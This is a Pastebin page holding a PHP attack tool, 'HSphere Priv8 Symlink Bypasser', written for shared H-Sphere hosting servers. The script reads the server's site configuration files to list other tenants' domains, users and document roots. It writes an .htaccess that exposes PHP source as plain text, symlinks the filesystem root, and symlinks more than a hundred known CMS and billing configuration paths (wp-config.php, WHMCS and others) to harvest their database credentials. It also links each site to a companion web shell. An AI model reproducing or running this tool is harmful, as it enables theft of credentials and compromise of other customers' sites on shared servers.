API tools faq
paste
Advertisement
0xspade

HSphere Priv8 Symlink Bypasser

0xspade
Sep 5th, 2016
273
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 5.98 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. //@error_reporting(0);
  3. //@ini_set("display_errors", 0);
  4. function scand( $path )
  5. {
  6.     if ( $d = scandir($path) )
  7.     {
  8.         return $d;
  9.         echo 'scandir';
  10.     }
  11.     elseif ($handle = opendir('.')) {
  12.         $d = array();
  13.         while (false !== ($entry = readdir($handle))) {
  14.             if ($entry != "." && $entry != "..") {
  15.                 $d[] = $entry;
  16.             }
  17.         }
  18.         closedir($handle);
  19.         return $d;
  20.     }
  21.     return false;
  22. }
  23. echo "<HTML>
  24. <head>
  25. <title>3Turr - Priv8 HsphereSym&Config bypasser</title>
  26. <link rel='shortcut icon' type='image/x-icon' href='https://avatars1.githubusercontent.com/u/13343571?v=3&s=460'>
  27. <style>
  28. a:link {color:white;}
  29. a:visited {color:red;}
  30. a:hover {color:red;}
  31. a:active {color:white;}
  32. table tr:hover{background-color:#730000;}
  33. table tr:hover{background-color:#730000;}
  34. input { background-color:#222222; border-radius:7px; -moz-border-radius:10px; border-color:#00FFFF; width:100px; color:#00FFFF ;}
  35.  
  36. </style>
  37.  
  38. </head>
  39. <body style='background-color:black;color:#00FFFF' ><center>
  40. <h1>3<font style='color:red'>Turr</font> ~ Priv8 HsphereSym&Config bypasser </h1>
  41. <a  target='_blank' href='http://turr.x10.mx/' >3Turr</a>
  42. <form method=POST><input type=submit name=priv9config value=GrapConfigs /></form>
  43. <hr>
  44. <table border='1' style='border-color:red;'>
  45. <tr>
  46. <td>SITE</td>
  47. <td>USER</td>
  48. <td>SYMLINK</td>
  49. <td>SH3LL</td>
  50. </tr>";
  51.  
  52. @mkdir("TurrHSphere", 0777);
  53. @chdir("TurrHSphere");
  54. $htaccess = "#H-Sphere 3Turr Priv8
  55. Options all
  56. Options +Indexes
  57. Options +FollowSymLinks
  58. DirectoryIndex 3Turr.Priv8
  59. AddType text/plain .php
  60. AddHandler server-parsed .php
  61. AddType text/plain .html
  62. AddHandler txt .html";
  63. file_put_contents(".htaccess", $htaccess);
  64.  
  65.  
  66. $configs = array('/includes/configure.php', '/os/includes/configure.php', '/oscom/includes/configure.php', '/oscommerce/includes/configure.php', '/oscommerces/includes/configure.php', '/shop/includes/configure.php', '/shopping/includes/configure.php', '/sale/includes/configure.php', '/amember/config.TXT.php', '/config.TXT.php', '/members/configuration.php', '/config.php', '/forum/includes/config.php', '/forums/includes/config.php', '/admin/conf.php', '/admin/config.php', '/wp-config.php', '/wp/wp-config.php', '/WP/wp-config.php', '/wp/beta/wp-config.php', '/beta/wp-config.php', '/press/wp-config.php', '/wordpress/wp-config.php', '/Wordpress/wp-config.php', '/blog/wp-config.php', '/wordpress/beta/wp-config.php', '/news/wp-config.php', '/new/wp-config.php', '/blog/wp-config.php', '/beta/wp-config.php', '/blogs/wp-config.php', '/home/wp-config.php', '/protal/wp-config.php', '/site/wp-config.php', '/main/wp-config.php', '/test/wp-config.php', '/arcade/functions/dbclass.php', '/joomla/configuration.php', '/protal/configuration.php', '/joo/configuration.php', '/cms/configuration.php', '/site/configuration.php', '/main/configuration.php', '/news/configuration.php', '/new/configuration.php', '/home/configuration.php', '/vb/includes/config.php', '/vb3/includes/config.php', '/cc/includes/config.php', '/includes/config.php', '/configuration.php', '/includes/dist-configure.php', '/zencart/includes/dist-configure.php', '/shop/includes/dist-configure.php', '/Settings.php', '/smf/Settings.php', '/forum/Settings.php', '/forums/Settings.php', '/upload/includes/config.php', '/article/config.php', '/up/includes/config.php', '/conf_global.php', '/include/db.php', '/connect.php', '/mk_conf.php', '/includes/config.php', '/config.php', '/sites/default/settings.php', '/sites/default/dbconfig.php', '/member/configuration.php', '/supports/includes/iso4217.php', '/client/includes/iso4217.php', '/support/includes/iso4217.php', '/billing/includes/iso4217.php', '/billings/includes/iso4217.php', '/host/includes/iso4217.php', '/hosts/includes/iso4217.php', '/hosting/includes/iso4217.php', '/hostings/includes/iso4217.php', '/includes/iso4217.php', '/hostbills/includes/iso4217.php', '/hostbill/includes/iso4217.php', '/cart/configuration.php', '/hosting/configuration.php', '/buy/configuration.php', '/checkout/configuration.php', '/host/configuration.php', '/shop/configuration.php', '/shopping/configuration.php', '/sale/configuration.php', '/client/configuration.php', '/support/configuration.php', '/clientsupport/configuration.php', '/whm/whmcs/configuration.php', '/whm/WHMCS/configuration.php', '/whmc/WHM/configuration.php', '/whmcs/configuration.php', '/supp/configuration.php', '/secure/configuration.php', '/secure/whm/configuration.php', '/secure/whmcs/configuration.php', '/panel/configuration.php', '/hosts/configuration.php', '/submitticket.php', '/clients/configuration.php', '/clientes/configuration.php', '/cliente/configuration.php', '/billing/configuration.php', '/manage/configuration.php', '/my/configuration.php', '/myshop/configuration.php', '/billings/configuration.php', '/supports/configuration.php', '/auto/configuration.php', '/go/configuration.php', '/bill/configuration.php', '/payment/configuration.php', '/pay/configuration.php', '/purchase/configuration.php', '/clientarea/configuration.php', '/autobuy/configuration.php' );
  67. $path = "/hsphere/local/config/httpd/sites/";
  68. $files = scand($path);
  69.  
  70. if(isset($_POST['priv9config']))
  71. {
  72.     echo "<br><a style='size:18' target='_blank' href='./TurrHSphere/' >Priv8C0nFigs</a><br>";
  73. }
  74.  
  75. @symlink('/', 'ROOT.php');
  76. for( $i=2; $i<count($files);$i++ )
  77. {
  78.     $content = file_get_contents($path.$files[$i]);
  79.     if ( preg_match( '/DocumentRoot(.*?)\\n.*?ServerName(.*?)\\n.*?Use UserGroup (.*?) /uis', $content, $m ) && !preg_match( '/\.bad/ui', $files[$i] ) )
  80.     {
  81.         $pwd = trim( $m[1] );
  82.         $domain = trim( $m[2] );
  83.         $user = trim( $m[3] );
  84.         if(isset($_POST['priv9config']))
  85.         {
  86.             for($x=0;$x<count($configs);$x++ )
  87.             {
  88.                 @symlink($pwd.'/'.$configs[$x], $user . '-'.rand(1,9999).'.TXT' );
  89.             }
  90.         }
  91.         echo "<tr><td><a  target='_blank' href='http://".$domain."/' >".$domain."</a></td>".
  92.         "<td>".$user."</td>".
  93.         "<td><a  target='_blank' href='./TurrHSphere/ROOT.php".$pwd."' >SymLink</a></td>".
  94.         "<td><a  target='_blank' href='./3Turr.php?c=".base64_encode($pwd)."' >Sh3ll</a></td></tr>";
  95.     }
  96. }
  97.  
  98. echo "</table>";
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!